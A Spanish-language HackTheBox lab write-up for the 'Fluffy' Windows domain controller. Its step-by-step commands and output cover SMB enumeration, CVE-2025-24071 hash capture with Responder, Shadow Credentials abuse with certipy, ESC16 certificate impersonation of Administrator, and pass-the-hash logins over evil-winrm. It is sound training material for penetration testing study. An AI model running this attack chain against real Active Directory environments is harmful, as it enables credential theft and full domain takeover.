Fluffy - HackTheBox
Máquina Windows nivel Easy de la plataforma HackTheBox que forma parte del path CPTS.
Updated
•12 min read
Disponemos de las credenciales j.fleischman / J0elTHEM4n1990! facilitadas por HackTheBox en la sala.
Reconocimiento de Puertos y Servicios
Comenzaremos realizando un escaneo básico de puertos para verificar qué puertos abiertos hay en la máquina víctima.
Para realizar este escaneo utilizaremos la herramienta nmap.
nmap -p- -Pn -n <ip> --min-rate 5000
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49693/tcp open unknown
49709/tcp open unknown
49717/tcp open unknown
Como vemos hay un listado de puertos muy amplio, por lo que lanzaré un escaneo más detallado para obtener más información sobre cada puerto abierto.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-19 17:21:35Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2025-09-19T17:22:28
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Descubrimos el dominio fluffy.htb y DC01.FLUFFY.HTB (Que corresponde al DC).
Puerto 88 (Kerberos)
Puerto 5985 - Puerto predeterminado para las conexiones HTTP de WinRM
Puerto 445 - SMB
SMB - Recurso compartido IT
Disponemos de credenciales, por lo que en primer lugar verificamos si son válidas para smb con netexec.
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
Las credenciales son válidas, por lo que podemos listar los recursos compartidos.
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
Disponemos permisos de lectura y escritura en el recurso IT, por lo que el primer paso será conectarnos para ver que encontramos.
smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Sep 19 19:36:03 2025
.. D 0 Fri Sep 19 19:36:03 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
5842943 blocks of size 4096. 1621122 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (520,3 KiloBytes/sec) (average 520,3 KiloBytes/sec)
Descubrimos un documento .pdf con el siguiente contenido:
Estamos ante un pequeño informe que comunica las vulnerabilidades encontradas en la infraestuctura empresarial, adjuntando los CVE de cada vulnerabilidad y la severidad.
Antes de continuar investigamos una por una cada vulnerabilidad con el fin de averiguar si podríamos abusar de alguna de ellas para ganar acceso a la máquina víctima.
CVE-2025-24071
Podemos aprovechar la vulnerabilidad CVE-2025-24071 para obtener el hash de un usuario del dominio tras subir al servicio smb un archivo .zip y ponernos en escucha con la herramienta responder.
Para conocer más sobre esta vulnerabilidad aconsejo revisar el final del documento donde dejo unos links de interés.
Para la explotación utilizaré la siguiente herramienta, que generará el archivo zip a subir.
https://github.com/0x6rss/CVE-2025-24071_PoC
smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
smb: \> put elc4br4.zip
putting file elc4br4.zip as \elc4br4.zip (2,9 kb/s) (average 2,9 kb/s)
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.21]
Responder IPv6 [dead:beef:2::1013]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-L91XIJC6X1U]
Responder Domain Name [MRKH.LOCAL]
Responder DCE-RPC Port [46419]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:<HASH>
Obtenemos el hash NTLMv2 del usuario p.agila, el cual intentamos craquear con John The Ripper.
Bloodhound
Llegados a este punto utilizo las credenciales que hemos obtenido recientemente para lanzar Bloodhound y buscar posibles configuraciones erróneas e intentar abusar de alguna de las mismas.
bloodhound-python -c all -d fluffy.htb -u p.agila -p 'password' --zip -ns 10.10.11.69
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250919131622_bloodhound.zip
En bloodhound vemos que el usuario p.agila pertenece al grupo Service Account Managers, y al pertenecer a este grupo podríamos abusar de GenericAll para añadirmos a su vez al grupo Service Accounts.
Ya que si nos añadimos a dicho grupo, tendríamos permisos GenericWrite sobre otros usuarios, por lo que podríamos ejecutar un ataque Shadow Credential.
Shadow Credential Attack
- Primero vamos a añadir al usuario p.agila al grupo Service Accounts.
bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p 'password' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
- Abusar de GenericWrite con pywhisker.py sobre el usuario winrm_svc.
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'password' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'fe8a3af3-dde4-7a17-e5af-cd105ae52ef2'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': <NT-HASH>
- Ahora que ya disponemos del hash NT del usuario winrm_svc podemos conectarnos a la máquina víctima a través de evil-winrm.
evil-winrm -i 10.10.11.69 -u winrm_svc -H <NT-HASH>
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
DC01
Usuario ca_svc
El siguiente paso será obtener el hash del usuario ca_svc de la misma manera que hicimos con el usuario winrm_svc.
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'password' -account 'ca_svc' -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'd21378a5-e675-3430-53b9-51791aa524d0'
[*] Adding Key Credential with device ID 'd21378a5-e675-3430-53b9-51791aa524d0' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'd21378a5-e675-3430-53b9-51791aa524d0' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': <NT-HASH-CA_SVC>
Escalada de Privilegios
Disponemos del hash del usuario ca_svc, y el propio usuario ya nos da una pista de por donde puede ir a escalada de privilegios...
Buscaremos plantillas de certificado vulnerables con certipy.
certipy-ad find -u 'ca_svc' -hashes <hash> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
ESC16
Podemos ver que existe una plantilla vulnerable a ESC16, por lo que procedemos a explotarlo.
- Modificar el UPN de ca_svc a administrator.
certipy-ad account update -username "p.agila@fluffy.htb" -p "password" -user ca_svc -upn 'administrator'
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
- Solicitamos el certificado con las credenciales de ca_svc.
certipy-ad req -u 'ca_svc' -hashes <hash> -dc-ip 10.10.11.69 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template User
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
- Modificamos de nuevo el UPN.
certipy-ad account update -username "p.agila@fluffy.htb" -p "password" -user ca_svc -upn 'ca_svc@fluffy.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
- Utilizamos el certificado administrator.pfx para autenticarnos y obtener el hash NTLM del usuario Administrator.
certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': <NTLM HASH>
- Finalmente utilizamos el hash para conectarnos a través WINRM y podremos leer la flag.
evil-winrm -i 10.129.232.88 -u administrator -H <HASH>
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users\Administrator\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/8/2026 8:54 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
LINKS - CVE-2025-24071
https://nvd.nist.gov/vuln/detail/CVE-2025-24071
https://www.incibe.es/index.php/incibe-cert/alerta-temprana/vulnerabilidades/cve-2025-24071
